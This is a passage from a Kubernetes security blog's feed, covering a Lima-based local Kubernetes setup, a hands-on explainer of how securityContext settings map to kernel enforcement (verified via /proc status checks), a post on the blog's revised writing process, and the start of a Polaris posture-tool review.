layer-sha256:8a735f2296d46b598dbc65289bfdc2ec4dd07607e69a1887e4ce6ef898be56e1:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:c0de4eea5b769c1703c4428a21cf0cce5b0a1668738391f1443979bb32cc9bc1:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:6628835d87d286d4d03f10b2c7f51d00f4556c49b5874947ce02609379069575:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:ceb87b8ac279a84fc99bdc30e7406cf21bf5d5841819fd0e3c8e0c06d867533c:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:f6b4fb9446345fcad2db26eac181fef6c0a919c8a4fcccd3bea5deb7f6dff67e:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:f4f04eae8d5eb8a0220a0d542da10f9c55b57a585dea1875cfbb1ee99d4c5a4a:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:a0ef6d8231d0e512c7a0c0f7029bcfb8c77f0848b9cb8ec5373b28991c83415b:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
layer-sha256:9076aaa4fd77085ce5562e9aca2b51ca88baf3fb8e41f8c777d0df14a1ce1085:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
elapsed: 4.2 s                                                                    total:  24.6 M (5.8 MiB/s)
d3d4038f5cb71c934703f165b636b5a66d9fa61892ee79f1fc37097d7a4ea4ff
</code></pre>
<p>From your Mac, open a browser and hit:</p>
<pre><code class="lang-bash">http://localhost:8080
</code></pre>
<p>That’s it.</p>
<ul>
<li><p>The container is running inside the Linux VM</p>
</li>
<li><p>The port is forwarded back to macOS</p>
</li>
<li><p>No Docker involved!</p>
</li>
</ul>
<p>At this point, we have Linux and a container runtime with full visibility into what’s actually running.</p>
<hr />
<h2 id="heading-kubernetes-with-lima">Kubernetes with Lima</h2>
<p>Lima also has a Kubernetes mode. This is real Kubernetes, but it’s optimized for speed and convenience. Not as much use for teaching cluster operations or mimicking production environments.</p>
<p>Start a Kubernetes-enabled Lima instance with default settings.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % limactl start --name lima-k8s template://k8s
WARN[0000] Template locator <span class="hljs-string">"template://k8s"</span> should be written <span class="hljs-string">"template:k8s"</span> since Lima v2.0
? Creating an instance <span class="hljs-string">"lima-k8s"</span> Proceed with the current configuration
...
Downloading the image (ubuntu-24.04-server-cloudimg-arm64.img)
592.12 MiB / 592.12 MiB [----------------------------------] 100.00% 19.40 MiB/s
INFO[0036] Downloaded the image from <span class="hljs-string">"https://cloud-images.ubuntu.com/releases/noble/release-20251213/ubuntu-24.04-server-cloudimg-arm64.img"</span>
INFO[0039] Attempting to download the nerdctl archive    arch=aarch64 digest=<span class="hljs-string">"sha256:2c4b97312acd41c4dfe80db6e82592367b3862b5db4c51ce67a6d79bf6ee00ee"</span> location=<span class="hljs-string">"https://github.com/containerd/nerdctl/releases/download/v2.2.1/nerdctl-full-2.2.1-linux-arm64.tar.gz"</span>
...
INFO[0292] Message from the instance <span class="hljs-string">"lima-k8s"</span>:
To run `kubectl` on the host (assumes kubectl is installed), run the following commands:
------
<span class="hljs-built_in">export</span> KUBECONFIG=<span class="hljs-string">"/Users/matt.brown/.lima/lima-k8s/copied-from-guest/kubeconfig.yaml"</span>
kubectl ...
------
</code></pre>
<p>So let's just run <code>kubectl</code> from our local machine after exporting.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % <span class="hljs-built_in">export</span> KUBECONFIG=<span class="hljs-string">"/Users/matt.brown/.lima/lima-k8s/copied-from-guest/kubeconfig.yaml"</span>
matt.brown@matt ~ % kubectl get po
No resources found <span class="hljs-keyword">in</span> default namespace.
</code></pre>
<p>Cool it is up and running.</p>
<p>Deploy something trivial and expose it.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % kubectl create deployment hello --image=nginx
deployment.apps/hello created
matt.brown@matt ~ % kubectl get po
NAME                     READY   STATUS    RESTARTS   AGE
hello-775d79c56b-jrnk5   1/1     Running   0          8s
matt.brown@matt ~ % kubectl expose deployment hello --<span class="hljs-built_in">type</span>=NodePort --port=80
service/hello exposed
</code></pre>
<p>Then let's grab the <code>NodePort</code>.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % kubectl get svc
NAME         TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)        AGE
hello        NodePort    10.97.172.133   &lt;none&gt;        80:31866/TCP   3s
kubernetes   ClusterIP   10.96.0.1       &lt;none&gt;        443/TCP        7m
</code></pre>
<p>From your Mac, open a browser and hit:</p>
<pre><code class="lang-bash">http://localhost:31866 <span class="hljs-comment">#or your NodePort</span>
</code></pre>
<p>That’s enough to prove the point. You have a working Kubernetes API, a running workload, and a cluster you didn’t have to assemble by hand.</p>
<p>This setup is well-suited for:</p>
<ul>
<li><p>API exploration</p>
</li>
<li><p>RBAC experiments</p>
</li>
<li><p>Admission and policy testing</p>
</li>
</ul>
<p>It’s not a replacement for a production-shaped cluster, but we know that.</p>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>In a single tool, we went from a clean Linux VM to a running process, a container, and a Kubernetes deployment. There was nothing complicated and thankfully no MiniKube.</p>
<p>That’s the point of Lima. There’s a lot more you can do here: custom images, multi-VM setups, deeper Kubernetes tuning. I might visit that in the future.</p>
<p>But for learning, testing, and fast iteration, this is where I wanted to land.</p>
]]></content:encoded></item><item><title><![CDATA[Kubernetes securityContext]]></title><description><![CDATA[Kubernetes has a talent I don’t: making hard problems feel solved the moment you put them in YAML.
securityContext is the best example.
Most people talk about it like it’s a “Kubernetes security feature.” It’s not. Kubernetes doesn’t enforce the thin...]]></description><link>https://cloudsecburrito.com/kubernetes-securitycontext</link><guid isPermaLink="true">https://cloudsecburrito.com/kubernetes-securitycontext</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[security Context]]></category><category><![CDATA[Linux]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Thu, 22 Jan 2026 04:09:51 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1769053208941/576d5517-5d81-4cc4-b5a9-d9ad4c2fba20.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Kubernetes has a talent I don’t: making hard problems feel solved the moment you put them in YAML.</p>
<p><code>securityContext</code> is the best example.</p>
<p>Most people talk about it like it’s a “Kubernetes security feature.” It’s not. Kubernetes doesn’t enforce the things you set here. It <strong>passes intent</strong> to the container runtime, which then asks the Linux kernel to apply controls like:</p>
<ul>
<li><p>syscall filtering (seccomp)</p>
</li>
<li><p>privilege scoping (capabilities)</p>
</li>
<li><p>mandatory access rules (LSMs like AppArmor)</p>
</li>
<li><p>identity defaults (UID/GID and group settings)</p>
</li>
</ul>
<p>That’s a contractual boundary, not a guarantee of outcome.</p>
<p>This post exists because we tend to do one of two things:</p>
<ul>
<li><p>ignore <code>securityContext</code> entirely, then act surprised when a pod behaves exactly like a pod</p>
</li>
<li><p>sprinkle a few fields into YAML and declare it “hardened”</p>
</li>
</ul>
<p>We’ll walk through what <code>securityContext</code> actually represents, why pod-level versus container-level scope matters, and where Kubernetes stops caring. This isn’t a copy-paste guide; it’s the mental model.</p>
<p>Along the way, we’ll anchor the discussion to topics already covered, including our old friends like Linux capabilities. These serve as reference points rather than detours.</p>
<hr />
<h2 id="heading-orientation-diagram-the-securitycontext-contract">Orientation Diagram: The <code>securityContext</code> Contract</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1769053286698/1d4c7669-90c3-4996-b517-6e277ba9ba72.png" alt class="image--center mx-auto" /></p>
<p>Keep this diagram in mind. Everything in this post maps back to where enforcement actually happens: the kernel.</p>
<hr />
<h2 id="heading-what-securitycontext-is-and-is-not">What <code>securityContext</code> Is (and Is Not)</h2>
<p>At its core, <code>securityContext</code> is an interface, not a security engine. Kubernetes does not implement seccomp. It does not enforce Linux capabilities. It does not mediate LSM decisions. What it does is collect intent from the workload spec and hand that intent to the container runtime at process start. From that point on, Kubernetes is out of the loop.</p>
<p>That distinction matters because it defines the limits of what Kubernetes can guarantee:</p>
<ul>
<li><p>Kubernetes can validate that your YAML is well-formed</p>
</li>
<li><p>Kubernetes can ensure the runtime receives your intent</p>
</li>
<li><p>Kubernetes cannot confirm that the kernel actually enforced it</p>
</li>
</ul>
<p>If a seccomp profile is missing, an AppArmor profile is not loaded, or a kernel feature is disabled, Kubernetes does not block the pod from starting. As far as the API server is concerned, its job is done. This is not a bug. Kubernetes is a scheduler and orchestration system. Host security enforcement happens elsewhere. <code>securityContext</code> is the handshake between those worlds.</p>
<hr />
<h2 id="heading-pod-level-vs-container-level-securitycontext">Pod-Level vs Container-Level <code>securityContext</code></h2>
<p>One of the easiest ways to misunderstand <code>securityContext</code> is to miss <strong>where</strong> it applies. Kubernetes allows <code>securityContext</code> to be defined at both the <strong>pod level</strong> and the <strong>container level</strong>, and those scopes behave very differently.</p>
<h3 id="heading-pod-level-securitycontext">Pod-Level <code>securityContext</code></h3>
<p>A pod-level <code>securityContext</code> defines <strong>defaults</strong> for every container in the pod.</p>
<p>This is where you can see:</p>
<ul>
<li><p>default user and group IDs</p>
</li>
<li><p>filesystem group ownership</p>
</li>
<li><p>a default seccomp profile</p>
</li>
</ul>
<p>These settings establish a baseline posture for the pod as a whole. If nothing else is specified, every container inherits them.</p>
<p>At this point you could say the pod is secure, but that assumption only holds if nothing overrides it.</p>
<h3 id="heading-container-level-securitycontext">Container-Level <code>securityContext</code></h3>
<p>Container-level <code>securityContext</code> applies to <strong>individual processes</strong>.</p>
<p>This is where you control:</p>
<ul>
<li><p>Linux capabilities</p>
</li>
<li><p>privilege escalation behavior</p>
</li>
<li><p>privileged mode</p>
</li>
<li><p>container-specific user overrides</p>
</li>
</ul>
<p>Container-level settings are authoritative. They can narrow the pod’s posture, but also weaken it. A pod can declare a reasonable default at the top level while a single container opts out of meaningful restrictions. Kubernetes allows this because pods are composition units, not trust boundaries.</p>
<p>The practical takeaway is simple:</p>
<blockquote>
<p>Pod-level <code>securityContext</code> expresses intent.<br />Container-level <code>securityContext</code> determines behavior.</p>
</blockquote>
<h3 id="heading-where-this-becomes-relevant">Where This Becomes Relevant</h3>
<p>This pod-versus-container split is why:</p>
<ul>
<li><p>admission policies might validate both scopes</p>
</li>
<li><p>scanners flag container-level exceptions even when pod defaults look fine</p>
</li>
<li><p>runtime tools frequently surface behavior that “shouldn’t have been allowed”</p>
</li>
</ul>
<hr />
<h2 id="heading-mapping-securitycontext-to-kernel-enforcement-what-actually-happens">Mapping <code>securityContext</code> to Kernel Enforcement (What Actually Happens)</h2>
<p>Before looking at behavior and failure modes, it helps to be explicit about <strong>what knobs actually exist</strong> and <strong>where they land</strong>.</p>
<p>Kubernetes exposes a relatively small <code>securityContext</code> surface area. Each field maps to a specific kernel mechanism.</p>
<blockquote>
<p>I suggest reading the API docs to supplement. <a target="_blank" href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.35/#podsecuritycontext-v1-core">Pod Security Context</a> and <a target="_blank" href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.35/#securitycontext-v1-core">Container Security Context</a>.</p>
</blockquote>
<h3 id="heading-securitycontext-fields-and-kernel-mapping"><code>securityContext</code> Fields and Kernel Mapping</h3>
<div class="hn-table">
<table>
<thead>
<tr>
<td>securityContext Field</td><td>Scope</td><td>Kernel Mechanism</td><td>What the Kernel Enforces</td></tr>
</thead>
<tbody>
<tr>
<td><code>allowPrivilegeEscalation</code></td><td>Container</td><td>no_new_privs</td><td>Whether exec can gain new privileges</td></tr>
<tr>
<td><code>appArmorProfile</code></td><td>Pod / Container</td><td>LSM</td><td>Resource access decisions</td></tr>
<tr>
<td><code>capabilities.add</code> / <code>capabilities.drop</code></td><td>Container</td><td>Linux capabilities</td><td>Which privileged operations may succeed</td></tr>
<tr>
<td><code>fsGroup</code></td><td>Pod</td><td>GID (filesystem)</td><td>File ownership and write permissions</td></tr>
<tr>
<td><code>fsGroupChangePolicy</code></td><td>Pod</td><td>Filesystem ownership change</td><td>Controls when volume ownership and permissions are modified before mount</td></tr>
<tr>
<td><code>privileged</code></td><td>Container</td><td>Multiple</td><td>Disables several isolation controls</td></tr>
<tr>
<td><code>procMount</code></td><td>Container</td><td>Multiple</td><td>Disables several isolation controls</td></tr>
<tr>
<td><code>readOnlyRootFilesystem</code></td><td>Container</td><td>VFS permissions</td><td>Filesystem write restrictions</td></tr>
<tr>
<td><code>runAsGroup</code></td><td>Pod / Container</td><td>GID</td><td>Process primary group</td></tr>
<tr>
<td><code>runAsNonRoot</code></td><td>Pod / Container</td><td>UID Check</td><td>Prevents process from running as UID 0</td></tr>
<tr>
<td><code>runAsUser</code></td><td>Pod / Container</td><td>UID</td><td>Process user identity</td></tr>
<tr>
<td><code>seLinuxChangePolicy</code></td><td>Pod</td><td>SELinux labeling (filesystem)</td><td>Controls how SELinux labels are applied to pod volumes</td></tr>
<tr>
<td><code>seLinuxOptions</code></td><td>Pod / Container</td><td>LSM</td><td>Resource access decisions</td></tr>
<tr>
<td><code>seccompProfile</code></td><td>Pod / Container</td><td>seccomp (BPF)</td><td>Which syscalls may execute</td></tr>
<tr>
<td><code>supplementalGroups</code></td><td>Pod</td><td>Groups</td><td>Additional group access</td></tr>
<tr>
<td><code>supplementalGroupsPolicy</code></td><td>Pod</td><td>Group resolution (UID/GID)</td><td>Controls how supplemental groups are calculated for container processes</td></tr>
<tr>
<td><code>sysctls</code></td><td>Pod</td><td>Kernel sysctl (namespaced)</td><td>Sets kernel parameters for the pod</td></tr>
<tr>
<td><code>windowsOptions</code></td><td>Pod / Container</td><td>Various</td><td>Additional options via Windows <code>SecurityContext</code></td></tr>
</tbody>
</table>
</div><h3 id="heading-what-this-looks-like-at-runtime">What This Looks Like at Runtime</h3>
<p>To make this concrete, consider a container with a <code>securityContext</code> that:</p>
<ul>
<li><p>runs as a non-root user</p>
</li>
<li><p>drops most Linux capabilities</p>
</li>
<li><p>disables privilege escalation</p>
</li>
<li><p>uses the default seccomp profile</p>
</li>
</ul>
<p>This is the kind of configuration many teams consider a reasonable baseline.</p>
<p>When the container starts, the runtime translates this configuration into kernel state before any application code runs.</p>
<p>First, the kernel assigns the process its UID, GID, and group set. At that point, the process is no longer “a container.” It is just a Linux process with an identity. If the application expected to run as root, that assumption is already broken.</p>
<p>Next, the kernel applies the capability set. Any operation that relies on a dropped capability fails at the kernel permission check, not in Kubernetes.</p>
<p>With privilege escalation disabled, the kernel also prevents the process from gaining additional privileges across exec boundaries. Even if a binary is misconfigured or marked setuid, the process cannot elevate itself later.</p>
<p>Then the seccomp filter is loaded. Seccomp does not wait for suspicious behavior. It defines which syscalls are allowed to execute at all. If the process attempts a disallowed syscall, the kernel intervenes immediately.</p>
<p>By the time the application starts executing logic, the kernel has already decided:</p>
<ul>
<li><p>the process runs as a non-root user</p>
</li>
<li><p>most privileged operations will fail due to dropped capabilities</p>
</li>
<li><p>the process cannot gain additional privileges through execution</p>
</li>
<li><p>only the syscalls allowed by the default seccomp profile may execute</p>
</li>
</ul>
<p>From Kubernetes’ point of view, the pod is simply running.  From the kernel’s point of view, the rules are already fixed.</p>
<p>This is why <code>securityContext</code> matters and is so easy to misunderstand.</p>
<hr />
<h2 id="heading-proving-the-contract-lets-actually-run-this">Proving the Contract: Let’s Actually Run This</h2>
<p>Up to this point, we’ve talked about intent, enforcement, and kernel behavior in the abstract. Now let’s stop theorizing and actually run something. The goal here isn’t to harden a production workload or enumerate every syscall. It’s to take a <strong>simple, representative</strong> <code>securityContext</code>, deploy it, and then observe what the kernel enforces in practice.</p>
<p>Here’s the pod.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">securitycontext-proof</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">securityContext:</span>
    <span class="hljs-attr">runAsNonRoot:</span> <span class="hljs-literal">true</span>
    <span class="hljs-attr">seccompProfile:</span>
      <span class="hljs-attr">type:</span> <span class="hljs-string">RuntimeDefault</span>
  <span class="hljs-attr">containers:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">demo</span>
    <span class="hljs-attr">image:</span> <span class="hljs-string">nginxinc/nginx-unprivileged</span>
    <span class="hljs-attr">command:</span> [<span class="hljs-string">"sh"</span>, <span class="hljs-string">"-c"</span>, <span class="hljs-string">"sleep 3600"</span>]
    <span class="hljs-attr">securityContext:</span>
      <span class="hljs-attr">allowPrivilegeEscalation:</span> <span class="hljs-literal">false</span>
      <span class="hljs-attr">capabilities:</span>
        <span class="hljs-attr">drop:</span>
          <span class="hljs-bullet">-</span> <span class="hljs-string">ALL</span>
</code></pre>
<p>This is intentionally boring.</p>
<p>In the sections that follow, we’ll look at what’s actually running on the node and how each part of this configuration shows up as a concrete, enforceable decision by the kernel.</p>
<h3 id="heading-what-this-looks-like-on-a-real-node">What This Looks Like on a Real Node</h3>
<p>At this point, nothing here is abstract anymore. The configuration has been applied, the process is running, and the kernel has already made its decisions. Now let’s look at what’s actually running on the node.</p>
<h4 id="heading-resolve-the-container-pid-on-the-host">Resolve the Container PID on the Host</h4>
<p>These commands bridge Kubernetes to the host kernel.</p>
<pre><code class="lang-bash">matt@cp:~/sec-context$ CID=$(kubectl get pod securitycontext-proof -o jsonpath=<span class="hljs-string">'{.status.containerStatuses[0].containerID}'</span> | sed <span class="hljs-string">'s|containerd://||'</span>)
PID=$(sudo crictl inspect <span class="hljs-variable">$CID</span> | jq -r .info.pid)
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Container PID on host: <span class="hljs-variable">$PID</span>"</span>
WARN[0000] Config <span class="hljs-string">"/etc/crictl.yaml"</span> does not exist, trying next: <span class="hljs-string">"/usr/bin/crictl.yaml"</span>
WARN[0000] runtime connect using default endpoints: [unix:///run/containerd/containerd.sock unix:///run/crio/crio.sock unix:///var/run/cri-dockerd.sock]. As the default settings are now deprecated, you should <span class="hljs-built_in">set</span> the endpoint instead.
WARN[0000] Image connect using default endpoints: [unix:///run/containerd/containerd.sock unix:///run/crio/crio.sock unix:///var/run/cri-dockerd.sock]. As the default settings are now deprecated, you should <span class="hljs-built_in">set</span> the endpoint instead.
Container PID on host: 77587
</code></pre>
<h4 id="heading-process-identity">Process Identity</h4>
<p>Validate that the process is running as a non-root user.</p>
<pre><code class="lang-bash">matt@cp:~/sec-context$ ps -o pid,uid,gid,cmd -p <span class="hljs-string">"<span class="hljs-variable">$PID</span>"</span>
    PID   UID   GID CMD
  77587   101   101 sh -c sleep 3600
</code></pre>
<p>Expected:</p>
<ul>
<li><p>UID != 0</p>
</li>
<li><p>GID != 0</p>
</li>
<li><p>Command matches the container entrypoint</p>
</li>
</ul>
<h4 id="heading-capabilities">Capabilities</h4>
<p>Inspect the effective capability set applied by the kernel.</p>
<pre><code class="lang-bash">matt@cp:~/sec-context$ sudo grep Cap /proc/<span class="hljs-variable">$PID</span>/status
CapInh:    0000000000000000
CapPrm:    0000000000000000
CapEff:    0000000000000000
CapBnd:    0000000000000000
CapAmb:    0000000000000000
</code></pre>
<p>Key field:</p>
<ul>
<li><code>CapEff</code> should be all zeros, indicating no effective capabilities.</li>
</ul>
<p>Optional decode for readability:</p>
<pre><code class="lang-bash">matt@cp:~/sec-context$ sudo capsh --decode=$(awk <span class="hljs-string">'/CapEff/ {print $2}'</span> /proc/<span class="hljs-variable">$PID</span>/status)
0x0000000000000000=
</code></pre>
<h4 id="heading-privilege-escalation-nonewprivs">Privilege Escalation (<code>no_new_privs</code>)</h4>
<p>Confirm that privilege escalation is disabled at the kernel level.</p>
<pre><code class="lang-bash">matt@cp:~/sec-context$ grep NoNewPrivs /proc/<span class="hljs-variable">$PID</span>/status
NoNewPrivs:    1
</code></pre>
<h4 id="heading-seccomp">Seccomp</h4>
<p>Check that a seccomp filter is active.</p>
<pre><code class="lang-bash">matt@cp:~/sec-context$ grep Seccomp /proc/<span class="hljs-variable">$PID</span>/status
Seccomp:    2
Seccomp_filters:    1
</code></pre>
<h3 id="heading-putting-it-together">Putting it Together</h3>
<p>Taken together, these checks show that the running process:</p>
<ul>
<li><p>has a non-root UID and GID</p>
</li>
<li><p>has no effective Linux capabilities</p>
</li>
<li><p>cannot gain privileges after startup</p>
</li>
<li><p>is constrained by a seccomp syscall filter</p>
</li>
</ul>
<p>At this point, the workload is no longer "a pod with a <code>securityContext</code>." It is a Linux process with a fixed identity, privilege set, and syscall surface.</p>
<p>Kubernetes expressed intent earlier. The kernel is now enforcing the contract.</p>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p><code>securityContext</code> does not secure a workload by itself. It defines the contract that the kernel will enforce. When that contract aligns with how an application actually behaves, it removes entire classes of risk.</p>
<p>When it doesn’t, the result is often surprising behavior, failed startups, or outright crashes. Those crashes are not Kubernetes being fragile. They are the kernel enforcing constraints that were previously absent or misaligned. Understanding why that happens is a topic worth its own deep dive.</p>
<p>For now, the key takeaway is simple:</p>
<ul>
<li><p>Kubernetes expresses intent</p>
</li>
<li><p>the runtime translates it</p>
</li>
<li><p>the kernel enforces it</p>
</li>
</ul>
<p>Everything else exists to make sure that contract is intentional, consistent, and observable.</p>
]]></content:encoded></item><item><title><![CDATA[CloudSec Burrito 2.0]]></title><description><![CDATA[Over the last year (actually 8 months), I managed to publish 23 posts on this blog. It meant a lot of long days, numerous lab rebuilds, half-finished markdown litter, and more time than I care to admit staring at Kubernetes YAML wondering why somethi...]]></description><link>https://cloudsecburrito.com/cloudsec-burrito-2-0-better-layers</link><guid isPermaLink="true">https://cloudsecburrito.com/cloudsec-burrito-2-0-better-layers</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[rbac]]></category><category><![CDATA[Linux]]></category><category><![CDATA[MermaidJS]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Fri, 16 Jan 2026 04:33:15 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1768522701411/50ae1c2d-ca08-4f89-967c-b951b81a2899.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Over the last year (actually 8 months), I managed to publish <strong>23 posts</strong> on this blog. It meant a lot of long days, numerous lab rebuilds, half-finished markdown litter, and more time than I care to admit staring at Kubernetes YAML wondering why something that <em>definitely</em> should have worked… didn’t.</p>
<p>Then things slowed down. December showed up. Life outside of Kubernetes continued to exist. The blog stalled a bit. Ideas did not dry up, but the process didn’t scale. Every post felt like a full production, which made consistency harder than it needed to be.</p>
<p>That’s what <strong>CloudSec Burrito 2.0</strong> is about. Not writing more. Writing <strong>more intentionally</strong>.</p>
<p>Part of that reset is tooling and structure. I’ve moved planning and drafting from .md files scattered everywhere into <strong>Notion</strong>, as a way to enforce consistency:</p>
<ul>
<li><p>Reusable post templates</p>
</li>
<li><p>Clear sections and framing</p>
</li>
<li><p>A bias toward diagrams and concrete artifacts</p>
</li>
<li><p>Less reinvention, more iteration</p>
</li>
</ul>
<p>Same topics. Same hands-on approach. Better assembly.</p>
<hr />
<h2 id="heading-what-changes-in-burrito-20">What Changes in Burrito 2.0</h2>
<p>Burrito 2.0 is about <strong>repeatable structure</strong>, not one-off essays.</p>
<p>Each post aims to ship <strong>at least one concrete artifact</strong>:</p>
<ul>
<li><p>A diagram that anchors the idea</p>
</li>
<li><p>A runnable or inspectable example</p>
</li>
<li><p>A decision or evaluation framework</p>
</li>
<li><p>A mental model you can reuse later</p>
</li>
</ul>
<p>And just as important:</p>
<blockquote>
<p><strong>Not every post needs to be a full sit-down meal.</strong></p>
</blockquote>
<p>You’ll see more <strong>short-form posts</strong> alongside deeper dives:</p>
<ul>
<li><p>One diagram with commentary</p>
</li>
<li><p>One focused lab note or gotcha</p>
</li>
<li><p>One clarification that saves you rereading a 2,000-word post</p>
</li>
</ul>
<p>Think fewer overstuffed burritos, more intentionally built tacos in between.</p>
<hr />
<h2 id="heading-a-concrete-example-how-do-you-actually-access-a-kubernetes-cluster">A Concrete Example: “How Do You Actually Access a Kubernetes Cluster?”</h2>
<p>Let’s pick on <a target="_blank" href="https://cloudsecburrito.com/access-control-actually-kubeadm-and-the-roots-of-kubernetes-access">one post</a> on K8s RBAC that I like. Which makes it a good candidate to highlight improvement.</p>
<p>It opens with a familiar lab reality:</p>
<blockquote>
<p><em>You’ve got a Kubernetes cluster running locally. You SSH to a node, run kubectl, and you’re in.</em></p>
</blockquote>
<p>From there, it walks through:</p>
<ul>
<li><p>SSH access to a node</p>
</li>
<li><p>kubeconfig and client certificates</p>
</li>
<li><p>Kubernetes authentication vs authorization</p>
</li>
<li><p>RBAC, ClusterRoles, and bindings</p>
</li>
<li><p>Service accounts and default tokens</p>
</li>
<li><p>The full auth → RBAC chain</p>
</li>
</ul>
<p>Technically: solid.<br />Educationally: useful.<br />Structurally: this is where Burrito 2.0 shows its value.</p>
<hr />
<h2 id="heading-how-this-post-could-have-been-better-burrito-20-lens">How This Post Could Have Been Better (Burrito 2.0 Lens)</h2>
<h3 id="heading-1-it-needed-an-early-diagram">1. It Needed an Early Diagram</h3>
<p>The post explains the access chain well, but only after a lot of text.</p>
<p>A simple diagram near the top would anchor everything that follows and give readers a mental model before diving into mechanics.</p>
<h3 id="heading-2-the-who-am-i-question-came-too-late">2. The “Who Am I?” Question Came Too Late</h3>
<p>A strong idea in the article is this contrast:</p>
<ul>
<li><p>Linux knows who I am.</p>
</li>
<li><p>Kubernetes often does not know the <em>human</em> behind the request.</p>
</li>
</ul>
<p>That question is the hook. In Burrito 2.0, it belongs up front, not halfway down the page.</p>
<h3 id="heading-3-it-mixed-learning-and-operating-without-calling-it-out">3. It Mixed “Learning” and “Operating” Without Calling It Out</h3>
<p>The post teaches:</p>
<ul>
<li><p>How Kubernetes access works</p>
</li>
<li><p>Why the default approach is risky in practice</p>
</li>
</ul>
<p>Both are valuable, but the transition between them wasn’t explicit.</p>
<hr />
<h2 id="heading-what-burrito-20-optimizes-for">What Burrito 2.0 Optimizes For</h2>
<p>Using that post as a reference point, Burrito 2.0 emphasizes:</p>
<ul>
<li><p>Diagrams early to anchor complex flows</p>
</li>
<li><p>Clear framing questions at the start</p>
</li>
<li><p>Explicit transitions from <em>how it works</em> to <em>why it matters</em></p>
</li>
<li><p>Shorter, focused follow-ups instead of one massive brain dump</p>
</li>
</ul>
<p><strong>Better layering</strong>.</p>
<hr />
<h2 id="heading-embedded-diagram-example-mermaid">Embedded Diagram Example (Mermaid)</h2>
<p>One of the concrete changes in Burrito 2.0 is pushing diagrams <em>earlier</em> in the post to anchor the discussion. Instead of discovering the flow halfway through a wall of text, the idea is to make the access path explicit up front.</p>
<p>This diagram shows the full chain from a human on a laptop to effective permissions inside the cluster. Using my new favorite language, Mermaid!</p>
<pre><code class="lang-mermaid">flowchart TB
    H["Human"] -- ssh --&gt; N["Node shell"]
    N -- kubectl --&gt; K["kubeconfig (current context)"]
    K --&gt; C["Credential (client cert / token)"]
    C --&gt; APIS["API Server"]
    APIS --&gt; ID["User + Groups (derived identity)"]
    ID --&gt; RBAC["RBAC (roles &amp; bindings in etcd)"]
    RBAC --&gt; PERM["Effective permissions"]
    APIS -- audit (if enabled) --&gt; AUD["Audit log entries"]
</code></pre>
<p>And the payoff.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1768537821685/5900bef4-03de-40da-8580-753586020098.png" alt class="image--center mx-auto" /></p>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>CloudSec Burrito 2.0 isn’t about a new direction. It’s about a better process.</p>
<p>Same tortilla. Better layers. More Chipotle level wrapping.</p>
<p>And yes, this might be a cheat post, but it counts in my book.</p>
]]></content:encoded></item><item><title><![CDATA[Kubernetes Posture Made Simple With Polaris]]></title><description><![CDATA[Kubernetes has slim pickings when it comes to open source “posture tools.” We’ve already looked at kube-bench, which is not terrible. So, still wandering the landscape in search of the Holy Grail, we’re now turning to Fairwinds Polaris.
Polaris tries...]]></description><link>https://cloudsecburrito.com/kubernetes-posture-made-simple-with-polaris</link><guid isPermaLink="true">https://cloudsecburrito.com/kubernetes-posture-made-simple-with-polaris</guid><category><![CDATA[fairwinds]]></category><category><![CDATA[kspm]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[polaris]]></category><category><![CDATA[admission controller]]></category><category><![CDATA[Security]]></category><category><![CDATA[Kubernetes Security]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Wed, 26 Nov 2025 21:16:27 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1764191712678/0f2f0ff5-f4fe-4fe7-ae41-9219a95af5ee.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Kubernetes has slim pickings when it comes to open source “posture tools.” We’ve already looked at <a target="_blank" href="https://cloudsecburrito.com/kube-bench-the-posture-check-that-time-forgot">kube-bench</a>, which is not terrible. So, still wandering the landscape in search of the Holy Grail, we’re now turning to <a target="_blank" href="https://polaris.docs.fairwinds.com/">Fairwinds Polaris</a>.</p>
<p>Polaris tries to cover three angles:</p>
<ul>
<li><p><strong>A dashboard</strong> that shows you workload posture issues (nothing groundbreaking, but workable)</p>
</li>
<li><p><strong>An admission controller</strong> that can… well, do admission controller things</p>
</li>
